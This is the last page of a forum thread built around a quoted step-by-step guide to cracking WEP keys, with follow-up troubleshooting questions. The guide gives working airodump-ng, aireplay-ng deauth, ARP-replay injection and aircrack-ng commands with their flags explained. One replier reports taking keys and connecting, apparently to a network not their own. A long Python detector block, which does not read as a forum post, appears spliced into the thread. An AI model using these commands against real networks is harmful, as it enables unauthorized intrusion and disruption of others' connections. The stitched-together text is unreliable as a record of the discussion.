Page 16 of 16
Results 151 to 159 of 159

Thread: Newbie Guide:- How to crack a WEP key, step by step. By another newbie.

  1. #151
    Just burned his ISO (Join Date: Dec 2007, Posts: 3)

    BT2 plus Netgear WG511T: do I need drivers and patches?

    Guys,
    I am doing all my homework, so do think I am not responsible, and pardon my ignorance. I have the BT2 live CD and just got a WG511T card. Do I now need to d/l drivers and patches for my card, or will it work out of the box?

    When I do an iwconfig and start the card in monitor mode I observed the following:
    1. The AP says "not associated", whereas I should be getting a six-figure number.

    2. The bit rate = 0 kbps.

    Is that normal? What am I doing wrong?

  2. #152
    vnxdragon (Guest)

    I got the key, now problem.....

    Quote Originally Posted by BigDook View Post
    Hi

    I have downloaded the latest BT and finally figured out how to crack a WEP key. Thought I'd post my routine for anyone else who might be having trouble.

    BTW, I'm a complete newbie to BT and any Linux related stuff, but will be hoping to change that.

    OK, first off some quick info on my specs. Acer Laptop (CeleronM) with built in Atheros 5005 wireless.

    1. Fire up Kismet and find the AP you wanna access, sort the listed APs by using "S" then "C". Then select your AP, hit "Enter" to get any info you may need from it (MAC Address, WEP, Channel etc.) Then press "q" to come out of that details screen, and with my AP selected type "L" (capital) which as far as I can see makes your card lock onto that AP.

    2. Open a console screen, then enter the following command to launch AiroDump which will "sniff" the packets about you.

    Command = "airodump-ng -w capture -c 6 ath0"

    OK, "airodump-ng" is the program itself.
    "-w capture" Gets it to write the sniffed packets to a file called "capture.cap".
    "-c 6" Makes the program ONLY sniff on channel 6.
    "ath0" The name of my wireless card.

    Leave that running, and keep an eye on the MAC address of your desired AP and the packets/data increasing (the Data is the IVs).

    3. Open another console to be used to make AirePlay perform a DE-AUTH attack on a specific machine connected to that AP. This should make that specific machine disconnect and reconnect to the AP, and in the process make it send data to the AP which will include the WEP key.

    Command = "aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 ath0"

    "aireplay-ng" is the program itself
    "-e DLINK" is the name of the SSID of the target AP.
    "-a 00:11:22:33:44:55" is the MAC address of the target AP.
    "-c 66:77:88:99:00:AA" is the MAC address of the target machine connected to that AP (you should be able to find any machines connected to the AP from looking at the info in AiroDump).
    "--deauth 10" The type of attack we're performing, in this case it's the DEAUTH attack repeated 10 times.
    "ath0" The name of my wireless card.

    Have that command ready to go, but don't do it yet.

    4. Open another console screen, and again we're going to use AIREPLAY, but this time it's going to capture some packets that might contain any IV data, then keep repeating to pump this info to the AP by "pretending" to be the target machine that the other instance of Aireplay performed the DEAUTH attack on.

    Command = "aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0"

    "aireplay-ng" Name of the program.
    "--arpreplay" Is the function of aireplay you are trying to perform, in this case it's a replay of an ARP request, which will contain IV data.
    "-b 00:11:22:33:44:55" MAC address of the target AP.
    "-h 66:77:88:99:00:AA" MAC address of the target machine connected to that AP.
    "ath0" Name of my wireless card.

    Right, run that command, and you should see it searching for packets.

    Fire off the previous command to initiate the DEAUTH attack, then switch back to the aireplay replay screen. And you should see it detect a deauth/discon of a machine, then it capture that packet, and start repeating to pump it back to the AP by pretending to be the target machine.

    Flick over to airodump screen, and HOPEFULLY it should have lots of DATA or IV packets coming through.

    You can close down the DEAUTH screen of aireplay now, and then let the other one keep replaying that packet until you feel you have enough packets to crack it, or just start the crack whilest more packets keep flooding through.

    5. Open the FINAL console screen which will be used to run AirCrack which will scan the captured packets from AiroDump.

    Command = "aircrack-ng -f 4 -m 00:11:22:33:44:55 -n 64 capture.cap"

    "aircrack-ng" Name of the program.
    "-f 4" Run the Fudgefactor 4 times (hehe, I have no idea what this is, but apparently you increase the fudgefactor to have a better chance of finding the key, but it will take longer the higher the number).
    "-m 00:11:22:33:44:55" MAC address of the target AP, so you're not searching packets of APs that you don't wanna crack.
    "-n 64" The amount of bits in the key, in this case it's 64, but there's also 128 etc.
    "capture.cap" Name of the capture file being created by AiroDump.

    Fire it off, and depending on how quick your machine is, how many IVs you've capped or what bit your key is (in my case only 64) and BINGO! It finds the key.

    I tested this on my home AP so I already knew the key, and only used one laptop.


    Am sure I've got some terms wrong, or could do it more efficiently, but this worked for this newbie, and I'm a very happy chap.

    Hope it helps anyone.

    TOTAL NOOB I AM. I got the keys, connected but no activity, can't go online, browser won't load any page. Any ideas on what's going on? What can I do from here? I wonder if it has anything to do with MAC Filtering? Please help or point to the right resource.
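
Seen from the defender's side, the two steps the quoted guide leans on (a burst of deauth frames aimed at one client, then the same encrypted ARP request injected over and over under the client's MAC) leave distinctive traces in a monitor-mode capture. The following is an added example, not code from the thread or from the aircrack-ng project: it runs two simple detectors over a constructed frame list that mimics that traffic, with the guide's example AP and client MACs and a hypothetical IV value.

```python
from collections import Counter, defaultdict

# MACs taken from the guide's example commands; traffic below is constructed.
AP = "00:11:22:33:44:55"
STA = "66:77:88:99:00:aa"


def constructed_capture():
    """One tuple per 802.11 frame: (time_s, subtype, src, dst, bssid, wep_iv)."""
    frames, t = [], 0.0
    for i in range(5):                      # normal client traffic: fresh IV per frame
        frames.append((t, "data", STA, AP, AP, f"{i:06x}"))
        t += 0.5
    for _ in range(10):                     # "--deauth 10": burst aimed at one client
        frames.append((t, "deauth", AP, STA, AP, None))
        t += 0.05
    for i in range(40):                     # ARP replay: identical ciphertext, same IV,
        frames.append((t, "data", STA, "ff:ff:ff:ff:ff:ff", AP, "0a1b2c"))
        # ...which the AP rebroadcasts with a new IV each time (the IVs being harvested)
        frames.append((t + 0.005, "data", AP, STA, AP, f"{0x100 + i:06x}"))
        t += 0.01
    return frames


def deauth_floods(frames, window_s=1.0, threshold=5):
    """Return {(bssid, client): peak deauth count} for pairs that see at least
    `threshold` deauth frames inside any `window_s` window. Legitimate roaming
    or AP idle-timeouts produce one or two, not a burst."""
    times = defaultdict(list)
    for t, sub, _, dst, bssid, _ in frames:
        if sub == "deauth":
            times[(bssid, dst)].append(t)
    hits = {}
    for key, ts in times.items():
        ts.sort()
        best = lo = 0
        for hi in range(len(ts)):           # sliding window over sorted timestamps
            while ts[hi] - ts[lo] > window_s:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            hits[key] = best
    return hits


def replayed_ivs(frames, threshold=10):
    """Return {(src, iv): count} for WEP data frames whose (source, IV) pair repeats
    `threshold` times or more. A real client picks a new IV per frame; an injector
    replaying one captured frame cannot, so the IV stays constant."""
    seen = Counter((src, iv) for _, sub, src, _, _, iv in frames if sub == "data" and iv)
    return {k: n for k, n in seen.items() if n >= threshold}
```

Both detectors are the kind of heuristic a wireless IDS (Kismet included) raises alerts on; the thresholds are illustrative and should be tuned against a site's normal roaming and retry rates.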

  3. #153
    Junior Member (Join Date: Jan 2008, Posts: 80)

    Can't access xploitz tuts

    Can someone please give me a link where I can download xploitz tutorials or watch them, cos each time I click on them it doesn't let me access them.

  4. #154
    Just burned his ISO (Join Date: Feb 2008, Posts: 1)

    For newbies?

    you might want to explain AP, kismet, BT..
    or don't call it a newbies guide


    (Admin edit: I've validated this post.........but how noob should we expect a newbie to really be!?!? If you're wanting to play with wifi but don't know what an AP is, then I just don't know what to say! As for Kismet - Google it........visit the Kismet web site, familiarise yourself, etc. There's a difference between a "newbie guide" and a complete "hand holding guide". Some effort is expected on the user's part.)

  5. #155
    Just burned his ISO (Join Date: Apr 2008, Posts: 8)

    Backtrack Freezing?

    Thanks for the tutorial, I have picked up quite a few things by reading through it as well as all the posts for replies. But I am a little stuck.

    I get to the point where I send the following commands

    aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA ath0

    and then this in another console
    aireplay-ng -e DLINK -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 ath0

    Now at this point the first command runs fine, but it tells me that the deauth is in progress and my system locks up. The keyboard doesn't work, I can move things with my mouse, but nothing changes from that point on.

    Now I have seen a few other tutorials where they use the MAC address of their card in the previous commands. This tutorial leads me to believe that I use the BSSID and the Station addresses. Is this correct?

    By the way I'm using the Backtrack 3 beta, if it matters. Thank you all in advance for the help.

    ~Nightwork

  6. #156
    Just burned his ISO (Join Date: Jun 2008, Posts: 2)

    Hi, I was wondering if anyone knew where I could get Kismet, as the links all seem to crash.

    Sorry, I'm just starting from scratch and I don't even know what cards I need to make this work. I've only got a wireless router and a plug-in USB adapter to use for this.

    thanks
    will

  7. #157
    Just burned his ISO (Join Date: Jun 2008, Posts: 11)

    Heyhey =D,

    Goddamn all my probs on Backtrack
    My problem which I have is with kismet ¬¬
    I can't find it in Backtrack or boot it.
    If I type
    kismet
    it gives some text and then says Fatal error
    and in the start menu kismet can't be found

    edit: I found it but a shell comes up and disappears immediately

  8. #158
    Junior Member (Join Date: Apr 2007, Posts: 57)

    Quote Originally Posted by beerieboy123 View Post
    Heyhey =D,

    Goddamn all my probs on Backtrack
    My problem which I have is with kismet ¬¬
    I can't find it in Backtrack or boot it.
    If I type
    kismet
    it gives some text and then says Fatal error
    and in the start menu kismet can't be found

    edit: I found it but a shell comes up and disappears immediately
    http://forums.remote-exploit.org/showthread.php?t=20182

    Kismet is looking for the device to use.

    This is quite a common problem and is also documented several times. I have only posted you one link, but there are quite a few posts explaining this.

    Out of interest what is the device you are using?
    One word : SEARCH

  9. #159
    Just burned his ISO (Join Date: Jun 2008, Posts: 11)

    *almost ashamed* xD
    Wifimax Dongle for Wii and Nintendo DS xD
    aahw god, I'm cheap xD
    ty for the link =P
    I'll try to fix it
    (Yes, you can use the dongle in BT2, did it earlier)
